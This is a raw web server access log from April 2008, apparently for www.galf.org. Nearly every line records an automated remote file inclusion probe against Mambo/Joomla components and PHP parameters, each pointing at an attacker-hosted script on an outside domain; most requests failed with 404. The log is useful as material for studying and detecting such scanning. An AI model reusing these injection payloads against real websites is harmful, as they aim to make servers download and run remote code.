205.234.253.11 - - [06/Apr/2008:17:00:13 -0700] "GET /logs/access_071231.log/template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:00:17 -0700] "GET /logs/access_071008.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:00:19 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:00:21 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:00:23 -0700] "GET /logs/access_071008.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:00:25 -0700] "GET /logs/access_071008.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:00:26 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:00:27 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:00:28 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:00:29 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:00:37 -0700] "GET /logs/access_071008.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:00:38 -0700] "GET /logs/access_071008.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:00:40 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:00:41 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:00:43 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:00:44 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.133.62 - - [06/Apr/2008:17:01:02 -0700] "GET /index.php?redir=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:01:10 -0700] "GET /logs/access_070709.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:01:16 -0700] "GET /logs/access_070709.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:01:17 -0700] "GET /logs/access_070709.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:01:18 -0700] "GET /logs/access_071210.log/main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:01:21 -0700] "GET /main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:01:22 -0700] "GET /logs/main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.218.85.18 - - [06/Apr/2008:17:01:26 -0700] "GET /logs/access.log/index.php?redir=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [06/Apr/2008:17:01:27 -0700] "GET /index.php?redir=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [06/Apr/2008:17:01:27 -0700] "GET /logs/index.php?redir=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:01:30 -0700] "GET /logs/access_070709.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [06/Apr/2008:17:01:33 -0700] "GET /logs/access_070709.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.29.32.2 - - [06/Apr/2008:17:01:54 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sp4ghy.iifree.net/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.29.32.2 - - [06/Apr/2008:17:01:54 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.29.32.2 - - [06/Apr/2008:17:01:54 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sp4ghy.iifree.net/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.29.32.2 - - [06/Apr/2008:17:01:55 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
222.239.227.174 - - [06/Apr/2008:17:02:40 -0700] "GET /about.php?dat=http://www.cellularone.ro/cellularone_j/templates/response?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
222.239.227.174 - - [06/Apr/2008:17:02:41 -0700] "GET /logs/about.php?dat=http://www.cellularone.ro/cellularone_j/templates/response?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
74.52.27.146 - - [06/Apr/2008:17:02:47 -0700] "GET /index.php?option=/?mosConfig_absolute_path=http://www.smdserv001.co.uk/cwfm/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
74.52.27.146 - - [06/Apr/2008:17:02:48 -0700] "GET /logs/index.php?option=/?mosConfig_absolute_path=http://www.smdserv001.co.uk/cwfm/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:03:20 -0700] "GET /logs/access_071224.log/index.php?principal=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:03:20 -0700] "GET /index.php?principal=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:03:20 -0700] "GET /logs/index.php?principal=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:03:34 -0700] "GET /logs/access.log/index.php?principal=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.220.215.233 - - [06/Apr/2008:17:03:34 -0700] "GET /index.php?principal=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.220.215.233 - - [06/Apr/2008:17:03:35 -0700] "GET /logs/index.php?principal=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
80.65.76.195 - - [06/Apr/2008:17:03:50 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.65.76.195 - - [06/Apr/2008:17:03:51 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.125.145.66 - - [06/Apr/2008:17:04:02 -0700] "GET /main.php?a=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
75.125.145.66 - - [06/Apr/2008:17:04:04 -0700] "GET /logs/main.php?a=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:05:53 -0700] "GET /logs/access_080113.log/index.php?doc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:05:54 -0700] "GET /index.php?doc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:05:54 -0700] "GET /logs/index.php?doc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
59.126.172.129 - - [06/Apr/2008:17:06:07 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://lineagezone.hopto.org/je/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
59.126.172.129 - - [06/Apr/2008:17:06:08 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://lineagezone.hopto.org/je/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
59.126.172.129 - - [06/Apr/2008:17:06:09 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://lineagezone.hopto.org/je/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.64.78.58 - - [06/Apr/2008:17:06:20 -0700] "GET /logs/access_070709.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
75.125.145.66 - - [06/Apr/2008:17:06:25 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
75.125.145.66 - - [06/Apr/2008:17:06:25 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:06:53 -0700] "GET /logs/access_070826.log/index.php?go=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:06:54 -0700] "GET /index.php?go=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:06:54 -0700] "GET /logs/index.php?go=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:07:34 -0700] "GET /logs/access.log/index.php?nic=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
205.234.253.11 - - [06/Apr/2008:17:07:36 -0700] "GET /index.php?nic=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
205.234.253.11 - - [06/Apr/2008:17:07:39 -0700] "GET /logs/access_080113.log/index2.php?content=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:07:40 -0700] "GET /index2.php?content=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:07:40 -0700] "GET /logs/index.php?nic=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
205.234.253.11 - - [06/Apr/2008:17:07:43 -0700] "GET /logs/index2.php?content=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
59.126.172.129 - - [06/Apr/2008:17:08:11 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://lineagezone.hopto.org/je/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
59.126.172.129 - - [06/Apr/2008:17:08:13 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://lineagezone.hopto.org/je/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
75.125.145.66 - - [06/Apr/2008:17:08:16 -0700] "GET //ecommerce/payment/cybersource.php?path[docroot]=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
75.125.145.66 - - [06/Apr/2008:17:08:16 -0700] "GET /logs//ecommerce/payment/cybersource.php?path[docroot]=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:08:36 -0700] "GET /logs/access_071015.log/index.php?arquivo=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:08:37 -0700] "GET /index.php?arquivo=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:08:37 -0700] "GET /logs/index.php?arquivo=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:09:20 -0700] "GET /logs/access.log/index.php?arquivo=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.220.215.233 - - [06/Apr/2008:17:09:21 -0700] "GET /index.php?arquivo=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
205.234.253.11 - - [06/Apr/2008:17:09:26 -0700] "GET /logs/access_080303.log/main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:09:39 -0700] "GET /logs/index.php?arquivo=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
205.234.253.11 - - [06/Apr/2008:17:09:44 -0700] "GET /logs/access_071015.log/index.php?arquivo=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:09:44 -0700] "GET /index.php?arquivo=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:09:49 -0700] "GET /logs/index.php?arquivo=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:10:24 -0700] "GET /logs/access_071015.log/index.php?configFile=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:10:25 -0700] "GET /index.php?configFile=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:10:25 -0700] "GET /logs/index.php?configFile=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:10:28 -0700] "GET /index.php?rage=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:10:28 -0700] "GET /logs/index.php?rage=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.169.116 - - [06/Apr/2008:17:10:32 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.52.169.116 - - [06/Apr/2008:17:10:32 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:10:38 -0700] "GET /logs/access.log/index.php?nic=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.220.215.233 - - [06/Apr/2008:17:11:03 -0700] "GET /logs/access_070903.log/index.php?go=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:11:36 -0700] "GET /logs/access_070820.log/index2.php?content=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.138.117.119 - - [06/Apr/2008:17:11:37 -0700] "GET /index3.php?s=http://www.cellularone.ro/cellularone_j/templates/response?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
200.138.117.119 - - [06/Apr/2008:17:11:38 -0700] "GET /logs/index3.php?s=http://www.cellularone.ro/cellularone_j/templates/response?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:11:45 -0700] "GET /logs/access_071210.log/index.php?rage=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:11:46 -0700] "GET /index.php?rage=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:11:49 -0700] "GET /logs/index.php?rage=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.207.204.13 - - [06/Apr/2008:17:12:04 -0700] "GET /logs/access_070709.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [06/Apr/2008:17:12:04 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [06/Apr/2008:17:12:05 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [06/Apr/2008:17:12:16 -0700] "GET /logs/access_071008.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:12:22 -0700] "GET /logs/access_071015.log/index.php?open=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:12:26 -0700] "GET /index.php?open=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:12:29 -0700] "GET /logs/index.php?open=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:12:39 -0700] "GET /logs/access.log/index.php?arquivo=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
205.234.253.11 - - [06/Apr/2008:17:12:41 -0700] "GET /index.php?arquivo=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
205.234.253.11 - - [06/Apr/2008:17:12:41 -0700] "GET /logs/index.php?arquivo=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
202.29.32.2 - - [06/Apr/2008:17:12:49 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sp4ghy.iifree.net/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.29.32.2 - - [06/Apr/2008:17:12:49 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.29.32.2 - - [06/Apr/2008:17:12:50 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.29.32.2 - - [06/Apr/2008:17:12:50 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sp4ghy.iifree.net/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.191.38.57 - - [06/Apr/2008:17:13:51 -0700] "GET /logs/about.php?path=http://www.cellularone.ro/cellularone_j/templates/response?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
202.191.38.57 - - [06/Apr/2008:17:13:51 -0700] "GET /about.php?path=http://www.cellularone.ro/cellularone_j/templates/response?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
59.126.172.129 - - [06/Apr/2008:17:13:51 -0700] "GET /logs/access_071022.log//admin/business_inc/saveserver.php?thisdir=http://lineagezone.hopto.org/je/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:14:48 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:14:49 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:14:49 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:14:54 -0700] "GET /logs/access_070730.log/index2.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:14:58 -0700] "GET /index2.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:14:58 -0700] "GET /logs/index2.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:15:13 -0700] "GET /logs/access_071119.log/main.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:15:17 -0700] "GET /main.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:15:18 -0700] "GET /logs/main.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:15:41 -0700] "GET /logs/access_070716.log/index2.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:15:58 -0700] "GET /logs/access.log/index.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:16:01 -0700] "GET /index.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:16:01 -0700] "GET /logs/index.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.238.233 - - [06/Apr/2008:17:16:25 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.238.233 - - [06/Apr/2008:17:16:25 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.242.100 - - [06/Apr/2008:17:16:38 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.geocities.com/s.memek/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.242.100 - - [06/Apr/2008:17:16:40 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.dfmuses.xpg.com.br/uses/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
